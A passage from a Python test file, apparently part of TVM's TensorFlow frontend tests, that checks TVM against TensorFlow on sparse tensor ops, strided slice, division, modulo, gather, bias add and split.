_test_sparse_dense_matmul([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [7, 9], [9, 5], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [4, 3], [3, 4], "float32", True)
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 3], [3, 3], "float32", True)
_test_sparse_dense_matmul(
[[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], "float32", True
)
_test_sparse_dense_matmul(
[[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [9, 5], [7, 9], "float32", True
)
#######################################################################
# SparseFillEmptyRows
# ------------
def _test_sparse_fill_empty_rows(indices_np, values_np, dense_shape_np, default_value_int, use_dyn):
with tf.Graph().as_default():
if use_dyn:
indices = tf.placeholder(shape=(None, None), dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=(None), dtype=values_np.dtype, name="values")
dense_shape = tf.placeholder(
shape=(None), dtype=dense_shape_np.dtype, name="dense_shape"
)
else:
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=values_np.shape, dtype=values_np.dtype, name="values")
dense_shape = tf.placeholder(
shape=dense_shape_np.shape, dtype=dense_shape_np.dtype, name="dense_shape"
)
default_value = tf.placeholder(shape=(), dtype=values_np.dtype, name="default_value")
sp_input = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=dense_shape)
_ = tf.sparse.fill_empty_rows(sp_input, default_value, name="sparse_fill_empty_rows")
compare_tf_with_tvm(
[indices_np, values_np, dense_shape_np, default_value_int],
[indices.name, values.name, dense_shape.name, default_value.name],
[
"sparse_fill_empty_rows/SparseFillEmptyRows:0",
"sparse_fill_empty_rows/SparseFillEmptyRows:1",
"sparse_fill_empty_rows/SparseFillEmptyRows:2",
],
mode="vm",
)
@pytest.mark.parametrize(
"sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int",
[
(
np.array([[1, 1], [0, 3], [0, 1], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4, 5], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[1, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[0, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[1, 1, 1], [1, 3, 1], [2, 0, 5], [3, 1, 6]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([7, 7, 7], dtype=np.int64),
5,
),
(
np.array([[1], [2]], dtype=np.int64),
np.array([7, 8], dtype=np.int64),
np.array([5], dtype=np.int64),
4,
),
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([5], dtype=np.int64),
4,
),
(
np.ones((0, 3), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([9, 3, 7], dtype=np.int64),
100,
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_sparse_fill_empty_rows(
sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int, use_dyn
):
"""sparse_fill_empty_rows op test"""
###################################################################
#
# In order to create a SparseTensor, it requires 3 input as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
# Above Sparse can be represented in Dense as below :
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
_test_sparse_fill_empty_rows(
sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int, use_dyn
)
#######################################################################
# SparseReshape
# ------------
def _test_sparse_reshape(indices_np, values_np, prev_shape_np, new_shape_np, use_dyn=False):
with tf.Graph().as_default():
if use_dyn:
indices = tf.placeholder(shape=(None, None), dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=(None), dtype=values_np.dtype, name="values")
prev_shape = tf.placeholder(shape=(None), dtype=prev_shape_np.dtype, name="prev_shape")
new_shape = tf.placeholder(shape=(None), dtype=new_shape_np.dtype, name="new_shape")
else:
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=values_np.shape, dtype=values_np.dtype, name="values")
prev_shape = tf.placeholder(
shape=prev_shape_np.shape, dtype=prev_shape_np.dtype, name="prev_shape"
)
new_shape = tf.placeholder(
shape=new_shape_np.shape, dtype=new_shape_np.dtype, name="new_shape"
)
sp_input = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=prev_shape)
_ = tf.sparse.reshape(sp_input, new_shape, name="sparse_reshape")
compare_tf_with_tvm(
[indices_np, values_np, prev_shape_np, new_shape_np],
[indices.name, values.name, prev_shape.name, new_shape.name],
["sparse_reshape:0", "sparse_reshape:1", "sparse_reshape/Identity:0"],
mode="vm",
)
@pytest.mark.parametrize(
"sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np",
[
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([4], dtype=np.int64),
np.array([2, -1], dtype=np.int64),
),
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([4], dtype=np.int64),
np.array([2, 2], dtype=np.int64),
),
(
np.ones((0, 2), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([3, 6], dtype=np.int64),
np.array([-1, 2], dtype=np.int64),
),
(
np.array([[0, 0, 0], [0, 0, 1], [0, 1, 0], [1, 0, 0], [1, 2, 3]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([2, 3, 6], dtype=np.int64),
np.array([-1, 9], dtype=np.int64),
),
(
np.array(
[
[0, 0, 0, 0, 0],
[0, 0, 1, 2, 3],
[0, 1, 0, 3, 5],
[1, 0, 0, 4, 6],
[1, 2, 3, 6, 8],
],
dtype=np.int64,
),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([2, 3, 6, 7, 9], dtype=np.int64),
np.array([9, -1, 7], dtype=np.int64),
),
(
np.array([[0, 0], [0, 1], [3, 4], [4, 3], [7, 3]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([9, 4], dtype=np.int64),
np.array([-1], dtype=np.int64),
),
(
np.array([[0], [5], [10], [20], [24]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([25], dtype=np.int64),
np.array([5, 5], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([500, -1], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([250, 40], dtype=np.int64),
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_sparse_reshape(
sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np, use_dyn
):
"""sparse_reshape op test"""
###################################################################
#
# In order to create a SparseTensor, it requires 3 input as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
# Above Sparse can be represented in Dense as below :
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
_test_sparse_reshape(sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np, use_dyn)
#######################################################################
# Sparse Segment Variants
# ------------
def _test_sparse_segment_variant(
tf_op, data_np, indices_np, segment_ids_np, num_segments, use_dyn=False
):
with tf.Graph().as_default():
if use_dyn:
data = tf.placeholder(
shape=[None for _ in data_np.shape], dtype=data_np.dtype, name="data"
)
indices = tf.placeholder(shape=[None], dtype=indices_np.dtype, name="indices")
segment_ids = tf.placeholder(
shape=(None), dtype=segment_ids_np.dtype, name="segment_ids"
)
else:
data = tf.placeholder(shape=data_np.shape, dtype=data_np.dtype, name="data")
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
segment_ids = tf.placeholder(
shape=segment_ids_np.shape, dtype=segment_ids_np.dtype, name="segment_ids"
)
_ = tf_op(
data, indices, segment_ids, num_segments=num_segments, name="sparse_segment_variant"
)
compare_tf_with_tvm(
[data_np, indices_np, segment_ids_np],
[data.name, indices.name, segment_ids.name],
["sparse_segment_variant:0"],
mode="vm",
)
@pytest.mark.parametrize(
"data_np, indices_np, segment_ids_np, num_segments",
[
(
np.array([5, 1, 7, 2, 3, 4], dtype=np.float32),
np.array([0, 3, 4], dtype=np.int32),
np.array([0, 1, 1], dtype=np.int32),
None,
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 1], dtype=np.int32),
np.array([0, 2], dtype=np.int32),
4,
),
(
np.random.random((6, 4, 5)),
np.array([0, 2, 4, 3, 1], dtype=np.int32),
np.array([0, 0, 1, 5, 5], dtype=np.int32),
100,
),
(
np.random.random((6, 4, 5)),
np.array([0, 2, 4, 3, 1], dtype=np.int32),
np.array([0, 0, 1, 5, 5], dtype=np.int32),
None,
),
(
np.array([[[1, 7]], [[3, 8]], [[2, 9]]], dtype=np.float64),
np.array([0, 1, 2], dtype=np.int32),
np.array([0, 0, 1], dtype=np.int32),
None,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 6, 7, 7, 8], dtype=np.int32),
9,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 6, 7, 7, 8], dtype=np.int32),
None,
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 1], dtype=np.int32),
np.array([0, 2], dtype=np.int32),
None,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 5, 5, 5, 5], dtype=np.int32),
6,
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
@pytest.mark.parametrize(
"tf_op",
[
tf.sparse.segment_sum,
tf.sparse.segment_sqrt_n,
tf.sparse.segment_mean,
],
)
def test_forward_sparse_segment_sum_variants(
tf_op,
data_np,
indices_np,
segment_ids_np,
num_segments,
use_dyn,
):
"""sparse segment sum variants tests"""
_test_sparse_segment_variant(tf_op, data_np, indices_np, segment_ids_np, num_segments, use_dyn)
#######################################################################
# Math SegmentSum
# ------------
def _test_math_segment_sum(data_np, segment_ids_np, use_dyn=False):
with tf.Graph().as_default():
if use_dyn:
data = tf.placeholder(
shape=[None for _ in data_np.shape], dtype=data_np.dtype, name="data"
)
segment_ids = tf.placeholder(
shape=(None), dtype=segment_ids_np.dtype, name="segment_ids"
)
else:
data = tf.placeholder(shape=data_np.shape, dtype=data_np.dtype, name="data")
segment_ids = tf.placeholder(
shape=segment_ids_np.shape, dtype=segment_ids_np.dtype, name="segment_ids"
)
_ = tf.math.segment_sum(data, segment_ids, name="segment_sum")
compare_tf_with_tvm(
[data_np, segment_ids_np],
[data.name, segment_ids.name],
["segment_sum:0"],
mode="vm",
)
@pytest.mark.parametrize(
"data_np, segment_ids_np",
[
(
np.array([5, 1, 7, 2, 3, 4], dtype=np.float32),
np.array([0, 0, 0, 1, 1, 1], dtype=np.int32),
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 0, 1], dtype=np.int32),
),
(
np.random.random((6, 4, 5)),
np.array([0, 0, 1, 2, 2, 3], dtype=np.int64),
),
(
np.array([[[1, 7]], [[3, 8]], [[2, 9]]], dtype=np.float32),
np.array([0, 0, 1], dtype=np.int32),
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 0, 0, 1, 2, 3, 4, 4, 5], dtype=np.int64),
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_math_segment_sum(data_np, segment_ids_np, use_dyn):
"""math segment sum test"""
_test_math_segment_sum(data_np, segment_ids_np, use_dyn)
# tensorflow.compat.v1.sparse_to_dense
# ---------------
def _test_sparse_to_dense(sparse_indices, sparse_values, default_value, output_shape):
with tf.Graph().as_default():
indices = tf.placeholder(
shape=sparse_indices.shape, dtype=str(sparse_indices.dtype), name="indices"
)
values = tf.placeholder(
shape=sparse_values.shape, dtype=str(sparse_values.dtype), name="values"
)
oshape = tf.constant(output_shape, shape=output_shape.shape, dtype=str(output_shape.dtype))
if default_value == None:
output = tf.sparse_to_dense(indices, oshape, values)
compare_tf_with_tvm(
[sparse_indices, sparse_values], ["indices:0", "values:0"], output.name
)
else:
dv = tf.placeholder(shape=(), dtype=str(default_value.dtype), name="default_value")
output = tf.sparse_to_dense(indices, oshape, values, dv)
compare_tf_with_tvm(
[sparse_indices, sparse_values, default_value],
["indices:0", "values:0", "default_value:0"],
output.name,
)
def test_forward_sparse_to_dense():
# scalar
_test_sparse_to_dense(
sparse_indices=np.int32(1),
sparse_values=np.int32(3),
default_value=np.int32(0),
output_shape=np.array([5]).astype("int32"),
)
# vector
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3, 3, 3]).astype("int32"),
default_value=np.int32(0),
output_shape=np.array([5]).astype("int32"),
)
# vector nXd
_test_sparse_to_dense(
sparse_indices=np.array([[0, 0], [1, 2]]).astype("int32"),
sparse_values=np.array([1, 2]).astype("int32"),
default_value=np.int32(0),
output_shape=np.array([3, 4]).astype("int32"),
)
_test_sparse_to_dense(
sparse_indices=np.array([[0, 0, 0], [1, 2, 3]]).astype("int32"),
sparse_values=np.array([1, 2]).astype("int32"),
default_value=np.int32(4),
output_shape=np.array([2, 3, 4]).astype("int32"),
)
# floats
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3.1, 3.1, 3.1]).astype("float32"),
default_value=np.float32(3.5),
output_shape=np.array([5]).astype("int32"),
)
# default value not specified
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3.1, 3.1, 3.1]).astype("float32"),
default_value=None,
output_shape=np.array([5]).astype("int32"),
)
#######################################################################
# tensorflow.sparse.to_dense
# ---------------
def _test_sparse_to_dense_v2(indices, values, A_shape, dtype, default_value=None):
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=A_shape)
result = tf.sparse.to_dense(A_sp, default_value=default_value)
compare_tf_with_tvm([], [], result.name)
def test_forward_sparse_to_dense_v2():
_test_sparse_to_dense_v2([[1]], [3.0], [5], "float32")
_test_sparse_to_dense_v2([[1]], [3.0], [5], "float32", 0.3)
_test_sparse_to_dense_v2([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], "float32")
_test_sparse_to_dense_v2([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], "float32", 1.3)
_test_sparse_to_dense_v2([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], "float32")
_test_sparse_to_dense_v2([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], "float32", 1.9)
#######################################################################
# tensorflow.sparse.add
# ----------------------------------
def _test_sparse_add(indices, values, A_shape, B_shape, dtype, flip=False):
"""One iteration of tf.sparse.add"""
# TODO(ANSHUMAN87): support cuda
# TODO(ANSHUMAN87): support both sparse input case
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(
indices=indices, values=np.array(values).astype(dtype), dense_shape=A_shape
)
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
# TODO(ANSHUMAN87): support user input threashold values
if flip:
result = tf.sparse.add(B, A_sp, threshold=0)
else:
result = tf.sparse.add(A_sp, B, threshold=0)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([B_np], [B.name], result.name, no_gpu=True)
def test_sparse_add():
"""sparse.add op test"""
###################################################################
#
# In order to create a SparseTensor, it requires 3 input as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
# Above Sparse can be represented in Dense as below :
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
for dtype_inp in ["float32", "float64", "int32"]:
_test_sparse_add([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [3, 4], dtype_inp)
_test_sparse_add([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [3, 4], dtype_inp, True)
_test_sparse_add([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], dtype_inp)
_test_sparse_add([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], dtype_inp, True)
#######################################################################
# StridedSlice
# ------------
def _test_stridedslice(
ip_shape,
begin,
end,
stride,
dtype,
begin_mask=0,
end_mask=0,
new_axis_mask=0,
shrink_axis_mask=0,
ellipsis_mask=0,
):
"""One iteration of a Stridedslice"""
tf.reset_default_graph()
np_data = np.random.uniform(size=ip_shape).astype(dtype)
with tf.Graph().as_default():
if len(ip_shape) == 0:
in_data = tf.constant(np_data, dtype)
else:
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.strided_slice(
in_data,
begin,
end,
stride,
begin_mask=begin_mask,
end_mask=end_mask,
new_axis_mask=new_axis_mask,
shrink_axis_mask=shrink_axis_mask,
ellipsis_mask=ellipsis_mask,
name="strided_slice",
)
if len(ip_shape) == 0:
compare_tf_with_tvm(None, "", "strided_slice:0")
else:
compare_tf_with_tvm(np_data, "in_data:0", "strided_slice:0")
def test_forward_stridedslice():
"""test StridedSlice"""
_test_stridedslice([], [0], [0], [1], "float32", new_axis_mask=1)
_test_stridedslice([2], [1], [1], [1], "float32", shrink_axis_mask=1)
_test_stridedslice([2, 1], [0], [1], [1], "float32", shrink_axis_mask=1)
_test_stridedslice([2, 3, 4], [0], [1], [1], "float32", shrink_axis_mask=8)
_test_stridedslice([3, 4, 3], [1, -1, 0], [4, -5, 3], [2, -1, 1], "float32")
_test_stridedslice([3, 4, 3], [1, 0], [4, 3], [2, 1], "float32", ellipsis_mask=8)
_test_stridedslice([3, 4, 3], [1, 0], [4, 2], [2, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 5, 3], [1, 0], [4, 2], [2, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 5, 3], [1, 0, 1], [4, 2, 2], [2, 1, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 3], [1, 1, 0], [4, 4, 2], [2, 1, 1], "float32", new_axis_mask=5)
_test_stridedslice(
[3, 4, 3], [1, 1, 1], [4, 4, 1], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=4
)
_test_stridedslice(
[6, 4, 5], [1, 1, 1], [6, 3, 4], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=5
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=4, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=3
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 1], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=3
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=2
)
_test_stridedslice((3, 4), [1, 0], [4, 4], [1, 1], "float32", shrink_axis_mask=2)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=2, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=1, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=2, new_axis_mask=1
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6], [0, 0], [2, 3], [1, 1], "float32", shrink_axis_mask=5, new_axis_mask=1
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=5,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=8,
end_mask=8,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=8,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=5,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=16,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=5,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[1, 2, 0, -3],
[4, 5, 3, 3],
[2, 2, 1, 1],
"float32",
shrink_axis_mask=8,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=8,
)
_test_stridedslice(
[1, 13, 13, 3, 2],
[0, 0],
[1, 1],
[1, -1],
"float32",
ellipsis_mask=1,
begin_mask=2,
end_mask=2,
)
#######################################################################
# FloorDiv, RealDiv
# -----------------
def _test_forward_divide(ip_shape, dtype):
np_numer = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
np_denomin = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, ip_shape, name="numer")
denominator = tf.placeholder(dtype, ip_shape, name="denomin")
tf.math.divide(numerator, denominator, name="RealDiv")
compare_tf_with_tvm([np_numer, np_denomin], ["numer:0", "denomin:0"], "RealDiv:0")
def _test_forward_floordiv(ip_shape, dtype):
np_numer = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, ip_shape, name="numer")
tf.math.floordiv(numerator, tf.constant(5, dtype=dtype), name="FloorDiv")
compare_tf_with_tvm([np_numer], ["numer:0"], "FloorDiv:0")
def test_forward_divide():
"""test FloorDiv, RealDiv"""
_test_forward_divide((4,), "int32")
_test_forward_divide((4, 3, 7), "float32")
_test_forward_floordiv((4, 3, 7), "float32")
_test_forward_floordiv((4, 3, 7), "int32")
#######################################################################
# FloorMod
# --------
def _test_forward_floormod(in_shape, if_shape, dtype):
np_numer = np.random.uniform(1, 100, size=in_shape).astype(dtype)
np_factor = np.random.uniform(1, 100, size=if_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, in_shape, name="numer")
factor = tf.placeholder(dtype, if_shape, name="factor")
tf.floormod(numerator, factor, name="FloorMod")
compare_tf_with_tvm([np_numer, np_factor], ["numer:0", "factor:0"], "FloorMod:0")
def test_forward_floormod():
"""test FloorMod"""
_test_forward_floormod((10,), (10,), "float32")
_test_forward_floormod((8, 2), (1,), "float32")
_test_forward_floormod((4, 3, 7), (4, 3, 7), "float32")
_test_forward_floormod((4, 3, 7), (4, 3, 7), "int32")
#######################################################################
# TruncateMod
# -----------
def _test_forward_truncatemod(ip_shape, dtype):
np_data_1 = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
np_data_2 = np.random.uniform(1, 10, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data_1 = tf.placeholder(dtype, ip_shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, ip_shape, name="in_data_2")
tf.truncatemod(in_data_1, in_data_2, name="truncatemod")
compare_tf_with_tvm([np_data_1, np_data_2], ["in_data_1:0", "in_data_2:0"], "truncatemod:0")
def test_forward_truncatemod():
"""test TruncateMod"""
_test_forward_truncatemod((4, 3, 7), "int32")
#######################################################################
# Gather, GatherV2
# --------------------------
def _test_gather(ip_shape, indice_shape, indice_value, axis, batch_dims, dtype):
"""One iteration of a GatherV2"""
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
indices = tf.placeholder("int32", indice_shape, name="indices")
out = tf.gather(in_data, indices, axis=axis, batch_dims=batch_dims)
np_data = np.random.uniform(1, 10, size=ip_shape).astype(dtype)
def _fill_indices(indice_value):
indices = np.array(ip_shape, dtype=dtype)
if isinstance(indice_value, int):
indices = np.array([indice_value], dtype="int32")
else:
indices = np.asarray(indice_value, dtype="int32")
return indices
np_indices = _fill_indices(indice_value)
compare_tf_with_tvm([np_data, np_indices], ["in_data:0", "indices:0"], out.name)
def test_forward_gather():
"""test Gather/GatherV2 layer"""
_test_gather((4,), (1,), 1, 0, 1, "int32")
_test_gather((4,), (1,), 1, 0, 0, "float32")
_test_gather((1, 4), (1,), [0], 0, 0, "int32")
_test_gather((4,), (1, 2, 2), [[[1, 0], [0, 1]]], 0, 0, "float32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 0, 0, "int32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 1, 0, "int32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 0, 0, "float32")
_test_gather((3, 3, 3), (1, 1, 2), [[[1, 0]]], 0, 0, "int32")
_test_gather((3, 3, 3), (1, 1, 2), [[[1, 0]]], 2, 0, "int32")
_test_gather((4, 3, 5, 6), (1, 4), [[2, 1, 0, 0]], 0, 0, "float32")
_test_gather((2, 2), (2, 2), [[0, 0], [0, 0]], 1, 1, "float32")
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 2, 2, "float32"
)
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 3, 1, "float32"
)
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 3, 2, "float32"
)
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 3, 0, "float32"
)
#######################################################################
# GatherND
# --------------------------
def _test_gather_nd(ip_shape, indice_value, dtype):
"""test operator GatherNd"""
np_data = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.gather_nd(in_data, indices=indice_value, name="gather_nd")
compare_tf_with_tvm([np_data], ["in_data:0"], "gather_nd:0")
def test_forward_gather_nd():
"""test operator GatherNd"""
_test_gather_nd((2, 2), [[0, 0], [1, 1]], "float32")
_test_gather_nd((2, 2, 2), [[1, 0, 0], [0, 0, 0]], "float32")
_test_gather_nd((4,), [1], "float32")
_test_gather_nd((4,), [1], "int32")
_test_gather_nd((1, 4), [0, 3], "int32")
_test_gather_nd((2, 2), [[[1, 0], [0, 1]]], "int32")
_test_gather_nd((2, 2), [[[1, 0], [0, 1]]], "float32")
_test_gather_nd((3, 3, 3), [[[1, 0]]], "int32")
_test_gather_nd((3, 3, 3), [[[1, 0]]], "int32")
_test_gather_nd((4, 3, 5, 6), [[2, 1, 0, 0]], "float32")
_test_gather_nd((3, 3, 3), [[[2, 1]]], "int32")
#######################################################################
# BiasAdd
# -------
def test_forward_bias_add():
"""test Op BiasAdd"""
def check_bias_add(lh_shpae, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shpae).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.nn.bias_add(lft_data, rgt_data, name="BiasAdd")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "BiasAdd:0")
check_bias_add((10, 8, 16, 32), (32,), dtype="int32")
check_bias_add((10, 20), (20,), dtype="float32")
#######################################################################
# Split
# -----
def _test_split(in_shape, axis, num_or_size_splits, dtype):
np_data = np.random.uniform(-5, 5, size=in_shape).astype(dtype)
""" One iteration of a Split """
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
num_split = (
len(num_or_size_splits) if isinstance(num_or_size_splits, list) else num_or_size_splits
)
split = tf.split(in_data, num_or_size_splits, axis=axis)
relu = [tf.nn.relu(i) for i in split]
compare_tf_with_tvm([np_data], ["in_data:0"], [n.name for n in relu])
# and now test together with concat
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
splitted = tf.split(in_data, num_or_size_splits, axis=axis)
concat = tf.concat(splitted, axis)
compare_tf_with_tvm([np_data], "in_data:0", concat.name)
def test_forward_split():
"""test split layer"""
# rank 1
_test_split((3,), 0, 1, "float32")
_test_split((3,), 0, 3, "float32")
